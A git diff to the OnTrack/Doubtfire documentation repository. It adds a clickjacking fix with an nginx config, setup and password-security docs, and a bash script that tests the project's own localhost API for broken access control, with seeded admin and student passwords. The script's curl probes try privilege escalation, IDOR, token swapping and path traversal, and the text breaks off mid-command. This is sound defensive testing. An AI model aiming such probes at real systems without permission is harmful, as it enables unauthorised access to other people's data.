diff --git a/README.md b/README.md index f4227eb0..99b2b69a 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,6 @@ +# Current deployment +https://ontrackdocumentation.netlify.app/ + # Contributing to Doubtfire Astro Repository This guide provides high-level details on how to contribute to the Doubtfire repositories. This repository reflects the code for Ontrack documentation website. diff --git a/artefacts/clickjacking/addressing-broken-access-control-clickjacking-vulnerability.md b/artefacts/clickjacking/addressing-broken-access-control-clickjacking-vulnerability.md new file mode 100644 index 00000000..eb429e94 --- /dev/null +++ b/artefacts/clickjacking/addressing-broken-access-control-clickjacking-vulnerability.md @@ -0,0 +1,74 @@ +# Addressing Broken Access Control (Clickjacking) Vulnerability (Documentation) + +## Summary +This PR provides documentation for remediating the `A01 Broken Access Control` vulnerability, specifically addressing the missing `X-Frame-Options` header. This vulnerability exposes the OnTrack application to clickjacking attacks, which could lead to unauthorized actions and data leakage. + +--- + +## Vulnerability Details + +### Description +Clickjacking, also known as a User Interface redress attack, occurs when a malicious website tricks users into clicking on hidden elements of another site. The absence of the `X-Frame-Options` header allows the OnTrack application to be embedded in an iframe, making it vulnerable to clickjacking. + +### Impact +- **Confidentiality**: None +- **Integrity**: Partial (e.g., unauthorised actions may be performed by users). +- **Availability**: None. + +### Affected Paths +The following paths lack the secure `X-Frame-Options` header: +- `http://localhost:4200/` +- `http://localhost:4200/assets/icons/` +- `http://localhost:4200/sitemap.xml` +- `http://localhost:4200/clientaccesspolicy.xml` +- `http://localhost:4200/assets/fonts/` +- Other static assets under `http://localhost:4200/assets/...`. + +--- + +## Remediation Plan + +### Overview +The remediation involves: +1. Adding the `X-Frame-Options` header to HTTP responses. +2. Setting the header value to `DENY` to block the application from being embedded in any iframe. + +### Implementation +- **File**: `doubtfire-web/nginx.conf` +- **Changes**: + Add the following line to the `server` block: + ```nginx + add_header X-Frame-Options "DENY" always; + ``` + +--- + +## Testing Plan + +### Functional Testing +1. Verify that the `X-Frame-Options` header is present in all HTTP responses using the following command: + ```bash + curl -I http://localhost:4200/ + ``` + **Expected Output**: + ```plaintext + HTTP/1.1 200 OK + X-Frame-Options: DENY + ``` +2. Ensure that the application continues to function normally after the changes. + +### Security Testing +1. Create a test HTML page that attempts to embed the application in an iframe: + ```html + + ``` +2. Open the test page in a browser and confirm the iframe is blocked. + +### Regression Testing +1. Validate that adding the `X-Frame-Options` header does not affect existing functionality, such as asset loading and API responses. + +--- + +## References +- [OWASP: Clickjacking](https://owasp.org/www-community/attacks/Clickjacking) +- [Mozilla Developer Network: X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options) diff --git a/artefacts/clickjacking/doubt-web-nginx-config.md b/artefacts/clickjacking/doubt-web-nginx-config.md new file mode 100644 index 00000000..86031f52 --- /dev/null +++ b/artefacts/clickjacking/doubt-web-nginx-config.md @@ -0,0 +1,56 @@ +worker_processes 1; + +events { } + +http { + include /etc/nginx/mime.types; + + sendfile on; + + # Server block for port 80 + server { + root /usr/share/nginx/html/; + index index.html; + listen 80; + + add_header Content-Security-Policy "default-src https: 'unsafe-inline' 'unsafe-eval' blob: data:" always; + add_header Feature-Policy "microphone 'self';speaker 'self';fullscreen 'self';payment none;" always; + add_header Permissions-Policy "microphone=(self), fullscreen=(self), payment=()" always; + + # X-Frame-Options header for clickjacking protection + add_header X-Frame-Options "DENY" always; + } + + # Server block for port 4200 + server { + root /usr/share/nginx/html/; + index index.html; + listen 4200; + + add_header Content-Security-Policy "default-src https: 'unsafe-inline' 'unsafe-eval' blob: data:" always; + add_header Feature-Policy "microphone 'self';speaker 'self';fullscreen 'self';payment none;" always; + add_header Permissions-Policy "microphone=(self), fullscreen=(self), payment=()" always; + + # X-Frame-Options header for clickjacking protection + add_header X-Frame-Options "DENY" always; + } + + # Server block for port 443 + server { + root /usr/share/nginx/html/; + index index.html; + listen 443; + + add_header Content-Security-Policy "default-src https: 'unsafe-inline' 'unsafe-eval' blob: data:" always; + add_header Feature-Policy "microphone 'self';speaker 'self';fullscreen 'self';payment none;" always; + add_header Permissions-Policy "microphone=(self), fullscreen=(self), payment=()" always; + + # X-Frame-Options header for clickjacking protection + add_header X-Frame-Options "DENY" always; + } + + gzip on; + gzip_types text/css application/javascript; + gzip_proxied any; + gzip_buffers 32 8k; +} diff --git a/astro.config.mjs b/astro.config.mjs index 7b743c0b..85e1df58 100644 --- a/astro.config.mjs +++ b/astro.config.mjs @@ -26,6 +26,10 @@ export default defineConfig({ directory: '/setup', }, items: [ + { + label: 'Frontend Documentation', + link: '/frontend/page', + }, { label: 'OnTrack Intial Setup Guidance', link: '/setup/set', @@ -39,10 +43,17 @@ export default defineConfig({ directory: '/frontend', }, items: [ + { - label: 'Frontend Documentation', - link: '/frontend/page', + label: 'Frontend Tutor-Times Design', + link: '/frontend/tutor-times/tutor-times-design', }, + { + label:'Frontend Tutor-Times Requirements', + link: '/frontend/tutor-times/tutor-times-requirements', + } + + ], }, @@ -59,7 +70,7 @@ export default defineConfig({ { label: 'activity types', link: '/backend/api/activity_types', - }, + }, { label: 'admin', link: '/backend/api/admin', @@ -168,6 +179,22 @@ export default defineConfig({ label: 'stats', link: '/backend/api/stats', }, + { + label: 'Tutor Times', + autogenerate: { + directory: '/tutor_times', + }, + items: [ + { + label: 'Requirements Document', + link: '/backend/tutor_times/requirements_document', + }, + { + label: 'Design Document', + link: '/backend/tutor_times/design_document', + }, + ], + }, ], }, { @@ -207,9 +234,15 @@ export default defineConfig({ { label: 'Backend APIs', link: '/courseflow/backend', - } + }, ], }, + { + label: 'Security', + autogenerate: { + directory: '/security', + }, + }, ], }), ], diff --git a/docs/ontrack-dev-environment-setup.md b/docs/ontrack-dev-environment-setup.md new file mode 100644 index 00000000..ec077481 --- /dev/null +++ b/docs/ontrack-dev-environment-setup.md @@ -0,0 +1,121 @@ +# OnTrack Development Environment Setup Guide + +Use this guide to correctly clone, configure, and set up the development environment for OnTrack using your GitHub fork and the correct remotes. Copy the commands and change `` to your actual GitHub username. + +## Tutorial Video + +You can watch the full step-by-step setup tutorial here: + +[Click to open the video in SharePoint](https://deakin365.sharepoint.com/:v:/s/ThothTech2/EYtXd8ztAdpKgI5Ki8jF7lMBC4ixVvhTzqqlDX3kmvBn4A?e=wK4v8n) + +## Understanding the Repository Structure + +Before starting, it's important to understand the different repository organizations: + +- **doubtfirelms** - The "upstream" organization that maintains the live versions of OnTrack used by several universities +- **thoth-tech** - Used internally at Deakin for the capstone unit (this is where you'll contribute) +- **Your fork** - Your personal copy where you'll push your changes + +## Branch Strategy + +**Critical:** All repositories (`doubtfire-deploy`, `doubtfire-web`, and `doubtfire-api`) must be on the **same branch** to ensure compatibility: + +- If working on **9.x** → all repos should be on `9.x` + +**For the next few semesters, we have agreed to use branch 9.x for all development work.** + +This is essential because different branches use different Docker builds with specific Node.js and Ruby versions that are only compatible within the same branch family. + +> **Avoid the `development` branch entirely** - it is outdated and unsupported. Switch to the appropriate version branch (e.g., `9.x`) immediately. + +## Step 1: Create or Navigate to the Dev Directory + +- Create the directory if it doesn't exist: + + ```bash + mkdir ~/dev + ``` + +- Navigate to it: + + ```bash + cd ~/dev + ``` + +## Step 2: Clone the `doubtfire-deploy` Repository with Submodules + +Replace `` with your GitHub username: + +```bash +git clone --recurse-submodules https://github.com//doubtfire-deploy.git +cd doubtfire-deploy +``` + +## Step 3: Set Up Remotes for `doubtfire-deploy` + +```bash +git remote set-url origin https://github.com//doubtfire-deploy.git +git remote add upstream https://github.com/thoth-tech/doubtfire-deploy.git +git fetch upstream +git checkout 9.x +``` + +## Remote Configuration Explained + +- **origin** → Points to your personal fork (where you push your changes) +- **upstream** → Points to thoth-tech repository (where you pull updates from) +- **doubtfirelms** → Can only be added later if needed for advanced merging (points to the live upstream repository) + +## Step 4: Configure `doubtfire-web` + +```bash +cd doubtfire-web +git remote set-url origin https://github.com//doubtfire-web.git +git remote add upstream https://github.com/thoth-tech/doubtfire-web.git +git fetch upstream +git checkout 9.x +``` + +## Step 5: Configure `doubtfire-api` + +```bash +cd .. +cd doubtfire-api +git remote set-url origin https://github.com//doubtfire-api.git +git remote add upstream https://github.com/thoth-tech/doubtfire-api.git +git fetch upstream +git checkout 9.x +``` + +## Critical Notes and Best Practices + +### Remote Configuration + +- **origin** should point to your fork — this is where you push your code +- **upstream** should point to the thoth-tech repo — pull updates from here +- **doubtfirelms** can be added later for advanced merging scenarios + +### Branch Management + +- **Never use the `development` branch** — it is outdated and unsupported +- **Always use matching branches** across all three repositories (deploy, web, api) +- **Stick to version branches** like `9.x`, `8.0.x`, or `10.0.x` + +### Before Opening Pull Requests + +- **Verify your last commit** before opening a pull request: + + ```bash + git log + ``` + +- **Compare your commit** with the one shown on `github.com/thoth-tech/doubtfire-xxx` for that repository +- **Avoid extra commits** from doubtfirelms repo that make PRs hard to review + +### Repository Understanding + +- **doubtfirelms** = Live upstream used by universities +- **thoth-tech** = Internal Deakin capstone development +- **Your fork** = Your personal development space + +> **Pro Tip:** If you've accidentally fetched branches from doubtfirelms, your PRs may contain extra commits. Always verify your latest commit matches the thoth-tech repository before submitting. diff --git a/docs/password_management_security.md b/docs/password_management_security.md new file mode 100644 index 00000000..90d3d253 --- /dev/null +++ b/docs/password_management_security.md @@ -0,0 +1,139 @@ +# Password Management Security Documentation + +## Overview + +This document outlines the security measures implemented for the password management system in Doubtfire. + +## Security Features + +### Password Storage +- **Bcrypt Hashing**: All passwords are hashed using BCrypt with salt +- **No Plain Text Storage**: Passwords are never stored in plain text +- **Salt Generation**: Each password gets a unique salt automatically + +### Password Validation +- **Minimum Length**: Passwords must be at least 8 characters long +- **Confirmation Matching**: Password confirmation must match the original password +- **Required Fields**: Password is required during registration and password changes + +### Password Reset Security +- **Token Generation**: Reset tokens are generated using `SecureRandom.urlsafe_base64` +- **Token Expiration**: Reset tokens expire after 24 hours +- **Single Use**: Tokens are cleared after successful password reset +- **Email Privacy**: The system doesn't reveal whether an email exists in the system + +### Authentication Security +- **Token-Based Auth**: Uses secure authentication tokens for API access +- **Token Expiration**: Authentication tokens have configurable expiration times +- **Current Password Verification**: Password changes require current password verification +- **Rate Limiting**: Consider implementing rate limiting for authentication attempts + +## API Endpoints Security + +### Registration Endpoint (`POST /api/register`) +- Validates all required fields +- Checks for existing username/email +- Validates password strength +- Creates user with student role by default +- Returns authentication token on success + +### Password Reset Request (`POST /api/password/reset`) +- Accepts email address +- Generates secure reset token +- Logs reset request (in production, send email) +- Doesn't reveal if email exists + +### Password Reset Confirmation (`POST /api/password/reset/confirm`) +- Validates reset token +- Checks token expiration +- Validates new password +- Clears reset token after successful reset + +### Change Password (`POST /api/password/change`) +- Requires authentication +- Verifies current password +- Validates new password +- Updates password hash + +## Security Considerations + +### Environment-Specific Behavior +- Password management endpoints are only available when using database authentication +- LDAP, AAF, and SAML authentication methods bypass password management +- This ensures compatibility with existing institutional authentication systems + +### Error Handling +- Generic error messages to prevent information disclosure +- Detailed validation errors only for legitimate users +- Proper HTTP status codes for different error conditions + +### Logging +- All password-related actions are logged with IP addresses +- Failed authentication attempts are logged +- Password reset requests are logged with tokens (for development) + +## Implementation Notes + +### Database Schema +The following fields are used for password management: +- `encrypted_password`: Stores the bcrypt hash +- `reset_password_token`: Stores reset tokens +- `reset_password_sent_at`: Tracks when reset was requested + +### Frontend Security +- Form validation on both client and server side +- Secure token handling in Angular services +- Proper error message display +- Password confirmation matching + +## Recommendations for Production + +### Email Integration +- Implement email sending for password reset links +- Use secure email templates +- Include expiration time in email +- Consider email rate limiting + +### Rate Limiting +- Implement rate limiting for authentication attempts +- Limit password reset requests per IP/email +- Implement account lockout after failed attempts + +### Monitoring +- Monitor for suspicious authentication patterns +- Log and alert on multiple failed attempts +- Track password reset request patterns + +### Additional Security +- Consider implementing password strength requirements +- Add CAPTCHA for registration and password reset +- Implement session management improvements +- Consider two-factor authentication for sensitive accounts + +## Testing + +Comprehensive tests have been implemented covering: +- User registration with valid/invalid data +- Password reset token generation and validation +- Password change with authentication +- Error handling and edge cases +- Security boundary conditions + +Run tests with: +```bash +rails test test/api/password_management_test.rb +``` + +## Configuration + +### Environment Variables +- `DF_AUTH_METHOD`: Set to 'database' to enable password management +- Other authentication methods (ldap, aaf, saml) will disable password management endpoints + +### Database Migrations +Ensure the following migrations are applied: +- Devise user creation migration +- Password reset token fields migration +- Any additional user fields migration + +"" diff --git a/public/admin-stats.png b/public/admin-stats.png new file mode 100644 index 00000000..1cc2c711 Binary files /dev/null and b/public/admin-stats.png differ diff --git a/public/tutor-progress.png b/public/tutor-progress.png new file mode 100644 index 00000000..c104e2ec Binary files /dev/null and b/public/tutor-progress.png differ diff --git a/public/units-filteration.png b/public/units-filteration.png new file mode 100644 index 00000000..645ae835 Binary files /dev/null and b/public/units-filteration.png differ diff --git a/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-API-02122024.pdf b/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-API-02122024.pdf new file mode 100644 index 00000000..80d5e82e Binary files /dev/null and b/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-API-02122024.pdf differ diff --git a/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-WEB-02122024.pdf b/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-WEB-02122024.pdf new file mode 100644 index 00000000..f2c05598 Binary files /dev/null and b/reports/security/Security-Audit-OWASP-Top-10-Results-localhost-WEB-02122024.pdf differ diff --git a/src/assets/logo.svg b/src/assets/logo.svg new file mode 100644 index 00000000..602d7cb8 --- /dev/null +++ b/src/assets/logo.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/src/assets/ontrack.webp b/src/assets/ontrack.webp deleted file mode 100644 index c0d21518..00000000 Binary files a/src/assets/ontrack.webp and /dev/null differ diff --git a/src/content/docs/BACaudit/api_endpoints.txt b/src/content/docs/BACaudit/api_endpoints.txt new file mode 100644 index 00000000..e419de92 --- /dev/null +++ b/src/content/docs/BACaudit/api_endpoints.txt @@ -0,0 +1,21 @@ +# Doubtfire API Endpoints List# +/api/activity_types +/api/admin +/api/auth +/api/auth_test +/api/campuses +/api/csv +/api/projects +/api/settings +/api/students +/api/submission +/api/tasks +/api/teaching_periods +/api/tii_actions +/api/tii_eula +/api/tii_hook +/api/tutorials +/api/unit_roles +/api/units +/api/users +/api/webcals \ No newline at end of file diff --git a/src/content/docs/BACaudit/broken_access_control_test.sh b/src/content/docs/BACaudit/broken_access_control_test.sh new file mode 100644 index 00000000..a7a3832c --- /dev/null +++ b/src/content/docs/BACaudit/broken_access_control_test.sh @@ -0,0 +1,538 @@ +#!/bin/bash +# Broken Access Control Test Script +# Purpose: Test for broken access control vulnerabilities in web applications +# Usage: ./broken_access_control_test.sh [API_URL] + +# Ensure script continues after command failures +set +e + +# Import API URL +if command -v node &> /dev/null; then + # Look for API URL in common locations + for path in \ + "./src/app/config/constants/apiURL.ts" \ + "./app/config/constants/apiURL.ts" \ + "../doubtfire-web/src/app/config/constants/apiURL.ts" + do + if [ -f "$path" ]; then + # Extract API_URL from TypeScript file + API_URL=$(grep -o "API_URL\s*=\s*[\"'][^\"']*[\"']" "$path" | head -1 | cut -d "'" -f2 | cut -d '"' -f2) + if [ ! -z "$API_URL" ]; then + break + fi + fi + done +fi + +# Allow overriding through parameter +if [ "$1" != "" ]; then + API_URL="$1" +fi + +# Default if not set +if [ -z "$API_URL" ]; then + API_URL="http://localhost:3000" +fi + +echo "Using API URL: $API_URL" + +# Client URL is typically different from API URL +CLIENT_URL=${API_URL/3000/4200} +if [[ "$CLIENT_URL" == "$API_URL" ]]; then + # If no port substitution happened, use a different port + CLIENT_URL="http://localhost:4200" +fi + + +LOG_FILE="broken_access_control_test_$(date +%Y%m%d_%H%M%S).log" + +# User credentials for testing +ADMIN_USERNAME="aadmin" +ADMIN_PASSWORD="password" +REGULAR_USER_USERNAME="student_1" +REGULAR_USER_PASSWORD="password" + +# ANSI color codes for output formatting +GREEN='\033[0;32m' +RED='\033[0;31m' +YELLOW='\033[0;33m' +BLUE='\033[0;34m' +NC='\033[0m' # No Color + +# Track test results +TESTS_PASSED=0 +TESTS_FAILED=0 +TESTS_SKIPPED=0 + +# Function to log results +log_result() { + local test_name=$1 + local result=$2 + local details=$3 + + echo -e "[$test_name] - $result\n$details\n" | tee -a "$LOG_FILE" +} + +# Function to check if access was denied as expected +check_denial() { + local status_code=$1 + local expected_denial=$2 + local response=$3 + local test_name=$4 + local test_type=$5 # Optional parameter to identify specific test types + + # Handle 405 responses for Missing Access Control tests (should be a PASS) + if [[ "$test_type" == "missing_access" && $status_code == 405 ]]; then + if [[ "$response" == *"405 Not Allowed"* ]]; then + log_result "$test_name" "${GREEN}PASS: Access denied as expected (Status: $status_code - Method Not Allowed)${NC}" "Response: $response" + ((TESTS_PASSED++)) + return 0 + fi + fi + + # Handle empty array/null responses for Missing Access Control tests + if [[ "$test_type" == "missing_access" && $status_code == 200 ]]; then + if [[ "$response" == "[]" || "$response" == "null" ]]; then + log_result "$test_name" "${YELLOW}INCONCLUSIVE: Endpoint returns empty result (Status: $status_code)${NC}" "Response: $response" + log_result "$test_name" "${YELLOW}NOTE: Although no actual data is returned, the endpoint can be accessed without authentication${NC}" "Consider requiring authentication based on the security requirements" + ((TESTS_SKIPPED++)) + return 0 + fi + fi + + # For path traversal tests + if [[ "$test_type" == "path_traversal" ]]; then + if [[ $status_code == 404 ]]; then + log_result "$test_name" "${YELLOW}ATTENTION REQUIRED: Path traversal test returned 404${NC}" "Response: $response" + log_result "$test_name" "${YELLOW}NOTE: While the server returned 404, manual verification is recommended${NC}" "Check if admin resources are accessible through other means" + ((TESTS_SKIPPED++)) + return 0 + elif [[ $status_code == 403 || $status_code == 401 ]]; then + log_result "$test_name" "${GREEN}PASS: Path traversal properly blocked (Status: $status_code)${NC}" "Response: $response" + ((TESTS_PASSED++)) + return 0 + else + log_result "$test_name" "${RED}FAIL: Path traversal may be possible (Status: $status_code)${NC}" "Response: $response" + ((TESTS_FAILED++)) + return 1 + fi + fi + + # For HTTP Method tests + if [[ "$test_type" == "http_method" && $status_code == 405 ]]; then + log_result "$test_name" "${GREEN}PASS: Access denied as expected (Status: $status_code - Method Not Allowed)${NC}" "Response: $response" + ((TESTS_PASSED++)) + return 0 + fi + + # For Function Level tests + if [[ "$test_type" == "function_level" && $status_code == 400 && "$response" == *"missing"* ]]; then + log_result "$test_name" "${YELLOW}INCONCLUSIVE: Request was processed but failed validation (Status: $status_code)${NC}" "Response: $response" + log_result "$test_name" "${YELLOW}NOTE: The API is accepting the request but rejecting it due to missing parameters${NC}" "This suggests the endpoint might lack proper permission checks, but further testing is needed" + ((TESTS_SKIPPED++)) + return 0 + fi + + # For Control Tests where user permissions may be legitimately restricted + if [[ "$test_type" == "control_user" && $status_code == 403 && "$response" == *"Unable to list"* ]]; then + log_result "$test_name" "${YELLOW}INCONCLUSIVE: Regular user may not have units assigned${NC}" "Response: $response" + log_result "$test_name" "${YELLOW}NOTE: The 403 response might be legitimate if the user doesn't have any assigned units${NC}" "This is expected behavior if the user's role doesn't include any units" + ((TESTS_SKIPPED++)) + return 0 + fi + + if [[ $status_code == 401 || $status_code == 403 || $status_code == 419 ]]; then + if [[ $expected_denial == true ]]; then + log_result "$test_name" "${GREEN}PASS: Access denied as expected (Status: $status_code)${NC}" "Response: $response" + ((TESTS_PASSED++)) + return 0 + else + log_result "$test_name" "${RED}FAIL: Access was denied but should have been allowed (Status: $status_code)${NC}" "Response: $response" + ((TESTS_FAILED++)) + return 1 + fi + else + if [[ $expected_denial == true ]]; then + log_result "$test_name" "${RED}FAIL: Access was allowed but should have been denied (Status: $status_code)${NC}" "Response: $response" + ((TESTS_FAILED++)) + return 1 + else + log_result "$test_name" "${GREEN}PASS: Access allowed as expected (Status: $status_code)${NC}" "Response: $response" + ((TESTS_PASSED++)) + return 0 + fi + fi +} + +# Main header +echo -e "${BLUE}===== Broken Access Control Test =====${NC}" | tee "$LOG_FILE" +echo -e "${BLUE}This test identifies broken access control vulnerabilities by simulating unauthorized access attempts${NC}" +echo -e "${BLUE}Expected result: All unauthorized access attempts should be denied${NC}\n" | tee -a "$LOG_FILE" + +# ===== OBTAIN AUTHENTICATION TOKENS ===== +echo -e "${BLUE}Obtaining authentication tokens for testing...${NC}" | tee -a "$LOG_FILE" + +# Get admin token +echo -e "${YELLOW}Logging in as admin (${ADMIN_USERNAME})...${NC}" +ADMIN_RESPONSE=$(curl -s -X POST "${API_URL}/api/auth" \ + -H "Content-Type: application/json" \ + -d "{\"username\":\"${ADMIN_USERNAME}\",\"password\":\"${ADMIN_PASSWORD}\"}" \ + -w "\n%{http_code}" 2>&1) + +ADMIN_STATUS=$(echo "$ADMIN_RESPONSE" | tail -n1) +ADMIN_BODY=$(echo "$ADMIN_RESPONSE" | sed '$d') + +# Extract admin token from the response +ADMIN_TOKEN=$(echo $ADMIN_BODY | grep -o '"auth_token":"[^"]*"' | sed 's/"auth_token":"//;s/"//') + +if [ -z "$ADMIN_TOKEN" ]; then + echo -e "${RED}Failed to get admin token. Check credentials or server status.${NC}" + echo -e "${RED}Status: $ADMIN_STATUS${NC}" + echo -e "${RED}Response: $ADMIN_BODY${NC}" + exit 1 +fi +echo -e "${GREEN}Successfully obtained admin token: ${ADMIN_TOKEN:0:10}...${NC}\n" + +# Get regular user token +echo -e "${YELLOW}Logging in as regular user (${REGULAR_USER_USERNAME})...${NC}" +REGULAR_USER_RESPONSE=$(curl -s -X POST "${API_URL}/api/auth" \ + -H "Content-Type: application/json" \ + -d "{\"username\":\"${REGULAR_USER_USERNAME}\",\"password\":\"${REGULAR_USER_PASSWORD}\"}" \ + -w "\n%{http_code}" 2>&1) + +REGULAR_USER_STATUS=$(echo "$REGULAR_USER_RESPONSE" | tail -n1) +REGULAR_USER_BODY=$(echo "$REGULAR_USER_RESPONSE" | sed '$d') + +# Extract regular user token from the response +REGULAR_USER_TOKEN=$(echo $REGULAR_USER_BODY | grep -o '"auth_token":"[^"]*"' | sed 's/"auth_token":"//;s/"//') + +if [ -z "$REGULAR_USER_TOKEN" ]; then + echo -e "${RED}Failed to get regular user token. Check credentials or server status.${NC}" + echo -e "${RED}Status: $REGULAR_USER_STATUS${NC}" + echo -e "${RED}Response: $REGULAR_USER_BODY${NC}" + exit 1 +fi +echo -e "${GREEN}Successfully obtained regular user token: ${REGULAR_USER_TOKEN:0:10}...${NC}\n" + +# ===== TEST 1: VERTICAL PRIVILEGE ESCALATION ===== +echo -e "${BLUE}Test 1: Vertical Privilege Escalation${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if a regular user can perform admin-only actions${NC}\n" + +# Test 1.1: Regular user attempts to create a unit (admin action) +echo -e "${YELLOW}Test 1.1: Regular user attempting to create a unit (admin action)...${NC}" +UNIT_CODE="TEST$(date +%H%M%S)" +UNIT_NAME="Security Test Unit $(date +%H:%M:%S)" + +RESULT1=$(curl -s -X POST "${API_URL}/api/units/" \ + -H "Content-Type: application/json" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -d "{\"unit\":{\"code\":\"${UNIT_CODE}\",\"name\":\"${UNIT_NAME}\"}}" \ + -w "\n%{http_code}" 2>&1) + +HTTP_STATUS1=$(echo "$RESULT1" | tail -n1) +RESPONSE_BODY1=$(echo "$RESULT1" | sed '$d') + +check_denial "$HTTP_STATUS1" true "$RESPONSE_BODY1" "Vertical Privilege Escalation: Regular user creating unit" + +# Test 1.2: Regular user attempts to access admin dashboard +echo -e "${YELLOW}Test 1.2: Regular user attempting to access admin dashboard...${NC}" +RESULT2=$(curl -s -X GET "${API_URL}/api/units?as_admin=true" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +HTTP_STATUS2=$(echo "$RESULT2" | tail -n1) +RESPONSE_BODY2=$(echo "$RESULT2" | sed '$d') + +check_denial "$HTTP_STATUS2" true "$RESPONSE_BODY2" "Vertical Privilege Escalation: Regular user accessing admin dashboard" + +# ===== TEST 2: INSECURE DIRECT OBJECT REFERENCES (IDOR) ===== +echo -e "\n${BLUE}Test 2: Insecure Direct Object References (IDOR)${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if users can access resources of other users by manipulating resource IDs${NC}\n" + +# Test 2.1: Access another user's data +echo -e "${YELLOW}Test 2.1: Attempting to access another user's data by ID manipulation...${NC}" +OTHER_USER_ID="2" # Assuming user ID 2 exists and is not the regular user + +# Try the direct user endpoint first +IDOR_RESULT1=$(curl -s -X GET "${API_URL}/api/users/${OTHER_USER_ID}" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +IDOR_STATUS1=$(echo "$IDOR_RESULT1" | tail -n1) +IDOR_BODY1=$(echo "$IDOR_RESULT1" | sed '$d') + +if [[ $IDOR_STATUS1 != 404 ]]; then + check_denial "$IDOR_STATUS1" true "$IDOR_BODY1" "IDOR: Accessing another user's data by ID" +else + echo -e "${YELLOW}Endpoint not found. Trying alternative endpoint...${NC}" + # Try the submissions endpoint + IDOR_RESULT1=$(curl -s -X GET "${API_URL}/api/users/${OTHER_USER_ID}/submissions" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + + IDOR_STATUS1=$(echo "$IDOR_RESULT1" | tail -n1) + IDOR_BODY1=$(echo "$IDOR_RESULT1" | sed '$d') + + if [[ $IDOR_STATUS1 != 404 ]]; then + check_denial "$IDOR_STATUS1" true "$IDOR_BODY1" "IDOR: Accessing another user's submissions by ID" + else + log_result "IDOR: Accessing another user's data by ID" "${YELLOW}SKIPPED: Endpoint not found (404)${NC}" "Consider customizing this test for the application's specific endpoints" + ((TESTS_SKIPPED++)) + fi +fi + +# Test 2.2: Access another unit's data +echo -e "${YELLOW}Test 2.2: Attempting to access unauthorized unit data...${NC}" +UNIT_ID="1" # Assuming unit ID 1 exists and user doesn't have access + +IDOR_RESULT2=$(curl -s -X GET "${API_URL}/api/units/${UNIT_ID}" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +IDOR_STATUS2=$(echo "$IDOR_RESULT2" | tail -n1) +IDOR_BODY2=$(echo "$IDOR_RESULT2" | sed '$d') + +# If the user has legitimate access to this unit, this test might need adjustment +# We'll check the response to see if it contains data +if [[ $IDOR_STATUS2 == 200 && "$IDOR_BODY2" == *"id"* && "$IDOR_BODY2" == *"name"* ]]; then + echo -e "${YELLOW}User appears to have legitimate access to this unit. Test may need adjustment.${NC}" + log_result "IDOR: Accessing unauthorized unit data" "${YELLOW}INCONCLUSIVE: User may have legitimate access${NC}" "Response contains unit data" + ((TESTS_SKIPPED++)) +else + check_denial "$IDOR_STATUS2" true "$IDOR_BODY2" "IDOR: Accessing unauthorized unit data" +fi + +# ===== TEST 3: SESSION TOKEN MISUSE ===== +echo -e "\n${BLUE}Test 3: Session Token Misuse${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if session tokens can be used across different user contexts${NC}\n" + +# Test 3.1: Use admin token with regular user credentials +echo -e "${YELLOW}Test 3.1: Attempting to use admin token with regular user credentials...${NC}" +TOKEN_RESULT1=$(curl -s -X POST "${API_URL}/api/units/" \ + -H "Content-Type: application/json" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${ADMIN_TOKEN}" \ + -d "{\"unit\":{\"code\":\"${UNIT_CODE}2\",\"name\":\"${UNIT_NAME} 2\"}}" \ + -w "\n%{http_code}" 2>&1) + +TOKEN_STATUS1=$(echo "$TOKEN_RESULT1" | tail -n1) +TOKEN_BODY1=$(echo "$TOKEN_RESULT1" | sed '$d') + +check_denial "$TOKEN_STATUS1" true "$TOKEN_BODY1" "Session Token Misuse: Regular user with admin token" + +# Test 3.2: Use regular user token with admin credentials +echo -e "${YELLOW}Test 3.2: Attempting to use regular user token with admin credentials...${NC}" +TOKEN_RESULT2=$(curl -s -X GET "${API_URL}/api/units?as_admin=true" \ + -H "Username: ${ADMIN_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +TOKEN_STATUS2=$(echo "$TOKEN_RESULT2" | tail -n1) +TOKEN_BODY2=$(echo "$TOKEN_RESULT2" | sed '$d') + +check_denial "$TOKEN_STATUS2" true "$TOKEN_BODY2" "Session Token Misuse: Admin user with regular token" + +# ===== TEST 4: URL MANIPULATION ===== +echo -e "\n${BLUE}Test 4: URL Manipulation${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if manipulating URL parameters can bypass access controls${NC}\n" + +# Test 4.1: Access control bypass through URL parameter manipulation +echo -e "${YELLOW}Test 4.1: Attempting to bypass access controls via URL parameters...${NC}" +URL_RESULT1=$(curl -s -X GET "${API_URL}/api/units?admin=true" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +URL_STATUS1=$(echo "$URL_RESULT1" | tail -n1) +URL_BODY1=$(echo "$URL_RESULT1" | sed '$d') + +check_denial "$URL_STATUS1" true "$URL_BODY1" "URL Manipulation: Using admin=true parameter" + +# Test 4.2: Path traversal attempt and frontend access check - REMOVED MANUAL NOTE +echo -e "${YELLOW}Test 4.2: Testing path traversal vulnerabilities and admin UI access...${NC}" + +# First test: Path traversal in API +URL_RESULT2=$(curl -s -X GET 